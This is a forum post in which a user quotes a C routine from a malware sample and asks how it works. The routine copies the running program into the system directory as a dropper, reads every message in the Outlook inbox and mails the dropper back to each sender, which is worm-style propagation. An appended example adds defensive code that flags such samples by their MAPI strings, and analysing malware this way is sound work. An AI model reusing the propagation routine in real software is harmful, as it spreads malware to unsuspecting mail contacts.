MAPI/RPC & Transport Protocol related C question.

  1. #1
    Sophie Pedophile Tech Support
    So I was going over some code related to some malware I was checking out and I found something that looked interesting. As you know, I am not much of a C programmer, but I am not entirely clueless about the language. The code snippet I have here deals with MAPI and, according to the comments in the source code, relates to some worm type of behavioral routine.


    #include <windows.h>
    #include <mapi.h>

    /* MAPI mailing routine */
    DWORD WINAPI MailMySelf(LPVOID Data)
    {
    /* Variables and pointers to MAPI functions */
    CHAR rgchMsgID[513];
    MapiMessage *lpMessage;
    HINSTANCE hi;
    LPMAPILOGON MAPILogon;
    LPMAPIFINDNEXT MAPIFindNext;
    LPMAPIREADMAIL MAPIReadMail;
    LPMAPISENDMAIL MAPISendMail;
    LPMAPILOGOFF MAPILogoff;
    LHANDLE lhSession;
    char dropper[MAX_PATH];
    char MyPath[MAX_PATH];

    if(!(hi = LoadLibrary( "mapi32.dll" )))
    {
    /* Fail to load mapi */
    return;
    }

    /* Get mapi functions */
    MAPILogon = (LPMAPILOGON)GetProcAddress( hi, "MAPILogon");

    MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress( hi, "MAPIFindNext");

    MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress( hi, "MAPIReadMail");

    MAPISendMail = (LPMAPISENDMAIL)GetProcAddress( hi, "MAPISendMail");

    MAPILogoff = (LPMAPILOGOFF)GetProcAddress(hi,"MAPILogoff");

    /* Check them */
    if( MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL ||
    MAPISendMail == NULL || MAPILogoff == NULL)
    {
    /* No MAPI functions :( */
    return;
    }

    /* Copy to dropper */
    GetModuleFileName(NULL,MyPath,MAX_PATH);
    GetSystemDirectory(dropper,MAX_PATH);
    strcat(dropper,"\\kkk.exe");
    CopyFile(MyPath,dropper,FALSE);

    /* Ok !, try to login */
    if(MAPILogon( 0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS)
    {

    *rgchMsgID = NULL;

    while(1)
    {

    if(MAPIFindNext( lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS)
    {
    break;
    }

    /* Read mail */
    if( MAPIReadMail( lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS)
    {
    /* Send ! */
    SendMail(lpMessage->lpOriginator->lpszAddress,MAPISendMail,
    lhSession,dropper);
    }
    }

    MAPILogoff( lhSession, 0L, 0L, 0L);

    }

    FreeLibrary(hi);

    }


    Now I know that MAPI is a messaging architecture and a COM object for Windows and is used by Outlook and similar programs, but reading the comments it looked to me that the author had intended it as a propagation mechanism or at least as part thereof. Would it be possible to use MAPI and the RPC as a transport protocol to transfer arbitrary data or files to machines on the same subnet?

    If so, how is this exactly accomplished, and if I am wrong about the function I pasted, please tell me a little about what it is supposed to do to the best of your knowledge.

    Post last edited by Sophie at 2017-07-15T19:45:11.419657+00:00
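A triage check for samples like the one posted, added here as an example and not part of the original post: the routine resolves the Simple MAPI functions with LoadLibrary/GetProcAddress, so mapi32.dll need not appear in the import table, but the names passed as string literals remain in the file as plain strings. The function names, flag values and sample buffers below are constructed for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Bit k of the mask is set when NAMES[k] is found in the buffer. */
enum { F_LOGON = 1, F_FINDNEXT = 2, F_READMAIL = 4, F_SENDMAIL = 8, F_LOGOFF = 16,
       F_DLLNAME = 32, F_WALKER = F_FINDNEXT | F_READMAIL | F_SENDMAIL };
static const char *const NAMES[] = { "MAPILogon", "MAPIFindNext", "MAPIReadMail",
                                     "MAPISendMail", "MAPILogoff", "mapi32.dll" };

/* Constructed sample buffers standing in for file contents (not real binaries). */
static const unsigned char SAMPLE_WALKER[] =
    "mapi32.dll\0MAPILogon\0MAPIFindNext\0MAPIReadMail\0MAPISendMail\0MAPILogoff";
static const unsigned char SAMPLE_SENDTO[] = "MAPI32.DLL\0MAPILogonEx\0MAPISendMail";

/* True if s occurs in buf as a whole NUL-terminated string. The NUL check keeps
   "MAPILogon" from matching "MAPILogonEx"; icase is used for the DLL name only. */
static int has_cstr(const unsigned char *buf, size_t len, const char *s, int icase) {
    size_t n = strlen(s), i, j;
    for (i = 0; i + n < len; i++) {
        for (j = 0; j < n; j++) {
            int a = buf[i + j], b = (unsigned char)s[j];
            if (icase ? tolower(a) != tolower(b) : a != b) break;
        }
        if (j == n && buf[i + n] == '\0') return 1;
    }
    return 0;
}

/* Mask of the Simple MAPI strings present in the buffer. */
unsigned mapi_string_mask(const unsigned char *buf, size_t len) {
    unsigned mask = 0;
    for (size_t k = 0; k < sizeof NAMES / sizeof NAMES[0]; k++)
        if (has_cstr(buf, len, NAMES[k], k == 5)) mask |= 1u << k;
    return mask;
}

/* 0 = no Simple MAPI strings; 1 = some MAPI use, no mailbox walk;
   2 = find-next + read + send together, the combination in the posted routine. */
int mapi_triage(const unsigned char *buf, size_t len) {
    unsigned m = mapi_string_mask(buf, len);
    return (m & F_WALKER) == F_WALKER ? 2 : (m ? 1 : 0);
}

int main(void) {
    printf("walker=%d sendto=%d\n", mapi_triage(SAMPLE_WALKER, sizeof SAMPLE_WALKER),
           mapi_triage(SAMPLE_SENDTO, sizeof SAMPLE_SENDTO));
    return 0;
}
```

A result of 1 is common in legitimate software that offers a "send as attachment" feature through MAPISendMail, so only the level 2 combination is worth prioritising, and string matching of this kind misses samples that build the names at run time.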